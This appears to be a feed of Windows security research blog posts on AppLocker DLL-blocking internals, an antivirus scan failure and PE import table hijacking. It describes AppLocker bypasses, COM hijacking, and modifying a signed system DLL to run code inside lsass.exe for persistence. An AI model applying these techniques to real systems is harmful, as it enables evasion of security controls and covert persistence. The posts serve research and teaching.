Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL applied security attributes now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example create the text file C:\TEMP\ABC.TXT, now to only allow notepad to open it do the following in PowerShell:

Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
     -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
     -SecurityInformation Dacl

Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)



The Internals of AppLocker - Part 4 - Blocking DLL Loading

By: tiraniddo
21 November 2019 at 06:42
This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

Warning text on DLL rules staying that enabling them could affect system performance.

It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly if you look at the names in APPID you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code to an device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

// 0x225804
#define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
            METHOD_BUFFERED, FILE_READ_DATA)

struct SRP_VERIFY_DLL_INPUT {
    ULONGLONG FileHandle;
    USHORT FileNameLength;
    WCHAR FileName[ANYSIZE_ARRAY];
};

struct SRP_VERIFY_DLL_OUTPUT {
    NTSTATUS VerifyStatus;
};

Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation I described in detail in part 2 and 3:
  1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
  2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
  3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
  4. Security attributes set on token using AiSetTokenAttributes.
  5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
It makes sense the the security attributes have to be recreated as the access check needs to know the information about the DLL being loaded not the original executable. Even though a file name is passed in the input structure as far as I can tell it's only used for logging purposes.

There is one big difference in step 1 where the token is captured over the one I documented in part 3. In process blocking if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or Microsoft just don't care?

Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

Breakpoint 1 hit
appid!SrpVerifyDll:
fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
0: kd> kc
 # Call Site
00 appid!SrpVerifyDll
01 appid!AipDeviceIoControlDispatch
02 nt!IofCallDriver
03 nt!IopSynchronousServiceTail
04 nt!IopXxxControlFile
05 nt!NtDeviceIoControlFile
06 nt!KiSystemServiceCopyEnd
07 ntdll!NtDeviceIoControlFile
08 ADVAPI32!SaferpIsDllAllowed
09 ADVAPI32!SaferiIsDllAllowed
0a ntdll!LdrpMapDllNtFileName
0b ntdll!LdrpMapDllFullPath
0c ntdll!LdrpProcessWork
0d ntdll!LdrpLoadDllInternal
0e ntdll!LdrpLoadDll

Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

NTSTATUS status;

if ((LoadInfo->LoadFlags & 0x100) == 0 
        && LdrpAdvapi32DllHandle) {
  status = LdrpSaferIsDllAllowedRoutine(
        LoadInfo->FileHandle, LoadInfo->FileName);
}

The call to SaferiIsDllAllowed  is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, mostly importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.

Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

The other condition, the LoadFlags is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LDrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll. Which looks like the following:

int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
  int load_flags = 0;
  // ...
  if (DllCharacteristics & 0x1000)
    load_flags |= 0x100;
   
  return load_flags;
}

If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

A simple PowerShell script to test this flag is below:
If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

Of course realistically the DLL blocking is really more about bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or writing to process memory it won't be easy to bypass the DLL verification (but of course it will not impossible).

This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start

2 December 2019 at 00:00
Intro Recently, I became rather intrigued after reading thisarticle from MSTIC about how Windows Defender Advanced Threat Protection (WDATP) is supposed to detect credential dumping by statistically probing the amount of data read from the LSASS process. A little background is first necessary, though: on a host guarded by WDATP, when a standard credential-dumper such as mimikatz is executed, it should trigger an alert like the following one. This alert is, in all likelihood, triggered as a result of mimikatz employing MiniDumpWriteDumpwhen trying accessing the LSASS process, which in turn uses ReadProcessMemoryas a means of copying data from one process address space to another one.

The Mysterious Case of a Broken Virus Scanner

By: tiraniddo
6 December 2019 at 03:08
On my VM (with a default Windows 10 1909) I used for my series of AppLocker I wanted to test out the new Edge.  I opened the old Edge and tried to download the canary installer, however the download failed, Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought might be the virus checking was trying to map the executable and somehow it was hitting the DLL verification callback and failing as the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDOWS% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error lead me to this code. The code was using the Attachment Services API. Which is a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

You might wonder how is this COM class is registered? An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:

PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

Windows Library Code

9 December 2019 at 12:00
Intro I thought I will make a guide about windows library code.. The target audience are beginners that want to understand more about windows reverse engineering, development and compilation. I tried to make this guide as simple as possible. A “Library” is a term used in computer science for a collection of pre-written code / variables. Libraries are pretty useful for developers because it saves development time. There are 2 types of libraries:

PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading

27 December 2019 at 03:56

Preface

In this post I describe a simple trick I came up with recently - something which is definitely nothing new, but as I found it useful and haven't seen it elsewhere, I decided to write it up.

What we want to achieve

So - let's consider backdooring a Windows executable with our own code by modifying its binary file OR one of its dependencies (so we are not talking about runtime code injection techniques or hooking,  neither about abusing known persistence features like AppInit DLLs and the like).

Most of us are familiar with execution flow hijacking combined with:

We probably heard of IAT hooking (in-memory), but how about on-disk?

Import Table and DLL loading

Both EXE and DLL files make use of a PE structure called Import Table, which is basically a list of external functions (usually just WinAPI) the program is using, along with the names of the DLL files they are located in. This list can be easily reviewed with any PE analysis/editing tool like LordPE, PEView, PEStudio, PEBear and so on:

An excerpt of the calc.exe Import table displayed in PEView

These are the runtime dependencies resolved by the Windows PE loader upon image execution, making the new process call LoadLibrary()  on each of those DLL files. Then the relevant entries for each individual function are replaced with with its current address within the just-loaded library (the GetProcAddress() lookup) - this is the normal and usual way of having this done, taken care by the linker during build and then by the Windows loader using the Import Table.

I need to mention that the process can as well be performed directly by the program (instead of using the Import Table), by calling both LoadLibrary() and then GetProcAddress(), respectively from its own code at some point (everyone who wrote a windows shellcode knows this :D). This second way of loading DLLs and calling functions from them is sometimes referred to as dynamic linking (e.g. required for calling native APIs) and in many cases is a suspicious indicator (often seen in malicious software).

Anyway, let's focus on the Import Table and how we can abuse it.

Getting right to it - hijacking the Import Table and creating the malicious PoC DLL

WARNING: Please avoid experimenting with this on a production system before you develop and test a working PoC, especially when dealing with native Windows DLLs (you could break your system, you've been warned). Do it on a VM after making a backup snapshot first.

So, without any further ado, let's say that for some reason (🤭) we would like to inject our code into lsass.exe.

Let's start with having a procmon look to see what DLLs does lsass.exe load:

A procmon filter for DLL loads performed by lsass.exe
The results once the filter is applied

Now, we are going to slightly modify one of these DLLs.

When choosing, preferably we should go after one that is not signed (as we want to chose one with high chances of being loaded after our modification).

But in this case, to my knowledge, they are all signed (some with embedded signatures - with the Digital Signatures tab visible in the explorer properties of the file, others signed in the C:\Windows\System32\catroot\).

The execution policy on this system, however, is unrestricted... oh wait, that's what I thought up until finishing up this write up, but then for diligence, I decided to actually make a screenshot (after seeing it I was surprised it worked, please feel free to try this at home):

ANYWAY - WE WANT to see what happens OURSELVES - instead of making self-limiting assumptions, so we won't let the presence of the signature deteriorate us. Also, in case system decides that integrity is more critical than availability and decides to break, we have a snapshot of the PoC development VM.

The second factor worth considering when choosing the target DLL is the presence of an Import Table entry we would feel convenient replacing (will become self-explanatory).

So, let's choose C:\Windows\System32\cryptnet.dll (sha256: 723563F8BB4D7FAFF5C1B202902866F8A0982B14E09E5E636EBAF2FA9B9100FE):

Now, let's view its Import Table and see if there is an import entry, which is most likely not used - at least during normal operations. Therefore such an entry is the most safe to replace (I guess now you see where this is going). We could as well ADD an import table entry, but this is a bit more difficult, introduces more changes into the target DLL and is beyond this particular blog post.

Here we go:

api-ms-win-core-debug-l1-1-0.dll with its OutputDebugStringA is a perfect candidate.

As Import Tables contain only one reference to each particular DLL name, all relevant functions listed in the Import Table simply refer to such DLL name within the table.

Hence, if we replace a DLL that has multiple function entries in the Import Table, we would have multiple functions to either proxy or lose functionality and risk breaking something (depending on how lazy we are).

Thus, a DLL from which only one function is imported is a good candidate. If the DLL+function is a dependency that has most likely already been resolved by the original executable before it loaded the DLL we are modifying, it's even better. If it is a function that is most likely not to be called during normal operations (like debugging-related functions), it's perfect.

Now, let's work on a copy of the target DLL and apply a super l33t offensive binary hacking technique - hex editor. First, let's find the DLL name (we simply won't care about the Import Table structure):

Searching for the DLL name in the Import Table using HxD

Got it, looks good:

Looks like we found it

Now, our slight modification:

Now, just changing ONE byte, that's all we need

So now our api-ms-win-core-debug-l1-1-0.dll became api-ms-win-code-debug-l1-1-0.dll.

Let's confirm the Import Table change in PEView:

Now, let's fire up our favorite software development tool and create api-ms-win-code-debug-l1-1-0.dll with our arbitrary code.

DevC++, new project, DLL, C

Using a very simple demo, grabbing the current module name (the executable that loaded the DLL) and its command line, appending it into a txt file directly on C: (so by default only high integrity/SYSTEM processes will succeed):

One thing, though - in order for the GetModuleFileNameA() function from the psapi library (psapi.h) to properly link after compilation, -lpsapi needs to be added to the linker parameters:

Code can be copied from here https://github.com/ewilded/api-ms-win-code-debug-l1-1-0/blob/master/dllmain.c.

OK, compile. Now, notice we used one export, called OutputFebugString (instead of OutputDebugString). This is because the linker would complain about the name conflict with the original OutputDebugString function that will get resolved anyway through other dependencies.

But since I wanted to have the Export Table in the api-ms-win-code-debug-l1-1-0.dll to match the entry from the cryptnet.dll Import Table, I edited it with HxD as well:

Fixing it

After:

Fixing it
Done

Normally we might want to test the DLL with rundll32.exe (but I am going to skip this part). Also, be careful when using VisualStudio, as it might produce an executable that by default will be x86 (and not x64) and for sure will produce an executable requiring visual C++ redistributables (even for a basic hello world-class application like this), while we might want to create portable code that will actually run on the target system.

What we are expecting to happen

We are expecting the lsass.exe process (and any other process that imports anything from cryptnet.dll) to load its tampered (by one byte!) version from its original location in spite of its digital signature being no longer valid (but again, lsass.exe and cryptnet.dll are just examples here).

We are also expecting that, once loaded, cryptnet.dll will resolve its own dependencies, including our phony api-ms-win-code-debug-l1-1-0.dll, which in turn, upon load (DllMain() execution) will execute our arbitrary code from within lsass.exe process (as well as from any other process that loads it, separately) and append our C:\poc.txt file with its image path and command line to prove successful injection into that process.

Deployment

OK, now we just need to deploy our version of cryptnet.dll (with the one Import Table entry hijacked with our phony api-ms-win-code-debug-l1-1-0.dll) along with our phony api-ms-win-code-debug-l1-1-0.dll itself into C:\Windows\System32\.

For this, obviously, we need elevated privileges (high integrity administrator/SYSTEM).

Even then, however, in this case we will face two problems (both specific to C:\Windows\System32\cryptnet.dll).

The first one is that C:\Windows\System32\cryptnet.dll is owned by TrustedInstaller and we (assuming we are not TrustedInstaller) do not have write/full control permissions for this file:

The easiest way to overcome this is to change the file ownership and then grant privileges:

The second problem we will most likely encounter is that the C:\Windows\System32\cryptnet.dll file is currently in use (loaded by multiple processes).

The easiest workaround for this is to first rename the currently used file:

Then deploy the new one (with hijacked Import Table), named the same as the original one (cryptnet.dll).

Below screenshot shows both new files deployed after having the original one renamed:

Showtime

Now, for diagnostics, let's set up procmon by using its cool feature - boot logging. Its driver will log events from the early stage of the system start process, instead of waiting for us to log in and run it manually. That boot log itself is, by the way, a great read:

Once we click Enable Boot Logging, we should see the following prompt:

We simply click OK.

Now, REBOOT!

And let's check the results.

This looks encouraging:

Oh yeah:

Let's run procmon to filter through the boot log. Upon running we should be asked for saving and loading the boot log, we click Yes:

Now, the previous filter (Process name is lsass.exe and Operation is Load Image) confirms that our phony DLL was loaded right after cryptnet.dll:

One more filter adjustment:

To once more confirm that this happened:

Why this can be fun

DLL side loading exploitation

This approach is a neat and reliable way of creating "proxy" DLLs out of the original ones (that differ by no more than one byte). Then we only might need to proxy one or few functions, instead of worrying about proxying all/most of them.

Persistence

Introducing injection/persistence of our own code into our favorite program's/service's EXE/DLL.

All with easy creation of the phony DLL (just write in C) and a simple byte replacement in an existing file, no asm required.

❌
❌